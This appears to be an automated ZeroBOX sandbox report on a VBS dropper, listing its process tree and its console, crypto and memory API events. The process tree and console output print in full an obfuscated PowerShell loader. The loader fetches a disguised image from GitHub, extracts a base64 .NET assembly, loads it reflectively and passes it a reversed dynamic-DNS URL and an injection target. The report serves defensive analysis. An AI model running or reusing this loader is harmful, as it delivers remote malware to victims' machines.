Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Oct. 18, 2024, 9:54 a.m.	Oct. 18, 2024, 9:56 a.m.

Size	190.8KB
Type	Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5	`f9c4326981028f9a6d08d989cea0b877`
SHA256	`db6181f2d49623f4731a8bddb45c8ff547c0c90628d134ec6467d242602ee6af`
CRC32	`E4D643B0`
ssdeep	`3072:HDgptUSEU1rFPgt5pgGwILS7Enl586f/ZZKQXkQ34skQ:HsYSEUz2nl5bJZKQ0QBR`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\THURSDAYYYYMPDW-constraints.vbs
300
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9aW1hZ2VVcmwgPSB7MX1odHRwczovL3Jhdy5naXRodWInKyd1c2VyY29udGVudC5jb20vQ3J5cHRlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMnKycvbWFpbi9EZScrJ3RhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaScrJ2VudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllJysnbnQ7ezB9aW1hZ2UnKydCJysneXRlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hJysnZERhdGEoezB9aW1hZ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGknKyduZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWcnKydlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0JysnX1NUQVJUPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRTY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hJysnZ2VUZXh0LkluZGV4T2YoezB9ZW5kRmxhZyk7ezB9c3RhJysncnRJbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZCcrJ2V4IC1ndCB7MH1zdGFydEluZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhcnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW4nKydndGggPSB7MH1lbmRJbicrJ2RleCAtIHswfXN0YXJ0SW5kJysnZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJJysnbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH0nKydjb20nKydtYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHswfWJhc2U2NENvbW1hbmQpO3swfWxvYWRlZCcrJ0Fzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MH1jbycrJ21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib20nKydlXS5HZXRNZXRob2QoezF9VkFJezF9KTt7JysnMH12YWlNZXRob2QuSW52Jysnb2tlKHswfW51JysnbGwsIEAoezF9dHh0LnFuYWJzb3RpdXFlZGV0YWRwdXJlZ2FuYW1vZ25hbWRldGFkJysnbmFtL2dyby5zJysnbmRrY3VkLmVlZWVsaWZ5eXl5eXlhZHNydWh0Ly86cHR0aHsxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9ZGVzYScrJ3RpdmFkb3sxfSwgezF9ZGVzJysnYXRpdmFkb3sxfSwgezF9QWRkSW5Qcm9jZXNzMzJ7MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWRlc2F0aXZhZG97MX0pKTsnKSAgLWZbY0hhcl0zNixbY0hhcl0zOSkgfCAmKCAkZU5WOmNvbVNQRUNbNCwyNCwyNV0tSk9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2080
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}imageUrl = {1}https://raw.github'+'usercontent.com/CryptersAndToolsOficial/ZIP/refs/heads'+'/main/De'+'tahNote_V.jpg {1};{0}webCli'+'ent = New-Object Sy'+'stem.Net.WebClie'+'nt;{0}image'+'B'+'ytes = {0}webClient.Downloa'+'dData({0}imageUrl);{0}imageText = [System.Text.Encodi'+'ng]::UTF8.GetString('+'{0}imag'+'eBytes);{0}startFlag = {1}<<BASE64'+'_START>>{1};{0}endFlag = {1}<<BASE64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}ima'+'geText.IndexOf({0}endFlag);{0}sta'+'rtIndex -ge 0 -and {0}endInd'+'ex -gt {0}startIndex;{0}startIndex += {0}startFlag.Length;{0}base64Len'+'gth = {0}endIn'+'dex - {0}startInd'+'ex;{0}base64Command = {0}imageText.Substring({0}startI'+'ndex, {0}base64Length);{0}'+'com'+'mandBytes = [System.Convert]::FromBase64String({0}base64Command);{0}loaded'+'Assembly = [System.Reflection.Assembly]::Load({0}co'+'mmandBytes);{0}vaiMethod = [dnlib.IO.Hom'+'e].GetMethod({1}VAI{1});{'+'0}vaiMethod.Inv'+'oke({0}nu'+'ll, @({1}txt.qnabsotiuqedetadpureganamognamdetad'+'nam/gro.s'+'ndkcud.eeeelifyyyyyyadsruht//:ptth{1}, {1}des'+'ativado{1}, {1}desa'+'tivado{1}, {1}des'+'ativado{1}, {1}AddInProcess32{1}, {1}desativado{1}, {1}desativado{1}));') -f[cHar]36,[cHar]39) | &( $eNV:comSPEC[4,24,25]-JOIn'')"
    2204

Name	Response	Post-Analysis Lookup
raw.githubusercontent.com		185.199.108.133

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 18, 2024, 9:54 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 18, 2024, 9:54 a.m.			0	0
IsDebuggerPresent Oct. 18, 2024, 9:54 a.m.			0	0

Command line console output was observed (50 out of 148 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The remote name could n console_handle: 0x00000023	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: ot be resolved: 'raw.githubusercontent.com'" console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: At line:1 char:192 console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: + $imageUrl = 'https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/re console_handle: 0x00000047	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: fs/heads/main/DetahNote_V.jpg ';$webClient = New-Object System.Net.WebClient;$i console_handle: 0x00000053	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mageBytes = $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text. console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $i console_handle: 0x00000077	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$st console_handle: 0x00000083	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: artIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Co console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mmand = $imageText.Substring($startIndex, $base64Length);$commandBytes = [Syste console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: m.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflecti console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: on.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI') console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: ;$vaiMethod.Invoke($null, @('txt.qnabsotiuqedetadpureganamognamdetadnam/gro.snd console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: kcud.eeeelifyyyyyyadsruht//:ptth', 'desativado', 'desativado', 'desativado', 'A console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: ddInProcess32', 'desativado', 'desativado')); console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000e3	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x0000010f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: Parameter name: bytes" console_handle: 0x0000011b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: At line:1 char:255 console_handle: 0x00000127	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: + $imageUrl = 'https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/re console_handle: 0x00000133	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: fs/heads/main/DetahNote_V.jpg ';$webClient = New-Object System.Net.WebClient;$i console_handle: 0x0000013f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encodi console_handle: 0x0000014b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: ng]::UTF8.GetString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag console_handle: 0x00000157	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $i console_handle: 0x00000163	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$st console_handle: 0x0000016f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: artIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Co console_handle: 0x0000017b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mmand = $imageText.Substring($startIndex, $base64Length);$commandBytes = [Syste console_handle: 0x00000187	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: m.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflecti console_handle: 0x00000193	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: on.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI') console_handle: 0x0000019f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: ;$vaiMethod.Invoke($null, @('txt.qnabsotiuqedetadpureganamognamdetadnam/gro.snd console_handle: 0x000001ab	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: kcud.eeeelifyyyyyyadsruht//:ptth', 'desativado', 'desativado', 'desativado', 'A console_handle: 0x000001b7	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: ddInProcess32', 'desativado', 'desativado')); console_handle: 0x000001c3	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001cf	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001db	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x000001fb	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: At line:1 char:361 console_handle: 0x00000207	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: + $imageUrl = 'https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/re console_handle: 0x00000213	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: fs/heads/main/DetahNote_V.jpg ';$webClient = New-Object System.Net.WebClient;$i console_handle: 0x0000021f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encodi console_handle: 0x0000022b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: ng]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<< console_handle: 0x00000237	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: BASE64_END>>';$startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $i console_handle: 0x00000243	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$st console_handle: 0x0000024f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: artIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Co console_handle: 0x0000025b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: mmand = $imageText.Substring($startIndex, $base64Length);$commandBytes = [Syste console_handle: 0x00000267	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: m.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflecti console_handle: 0x00000273	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: on.Assembly]::Load($commandBytes);$vaiMethod = [dnlib.IO.Home].GetMethod('VAI') console_handle: 0x0000027f	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: ;$vaiMethod.Invoke($null, @('txt.qnabsotiuqedetadpureganamognamdetadnam/gro.snd console_handle: 0x0000028b	1	1
WriteConsoleW Oct. 18, 2024, 9:54 a.m.	buffer: kcud.eeeelifyyyyyyadsruht//:ptth', 'desativado', 'desativado', 'desativado', 'A console_handle: 0x00000297	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba440 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005baa00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005baa00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005baa00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005baa00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005baa00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005baa00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9c40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba840 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d13d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1998 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 18, 2024, 9:54 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d1118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 18, 2024, 9:54 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 287 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 1245184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0246a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02462000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02472000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02473000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02474000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 18, 2024, 9:54 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0252b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
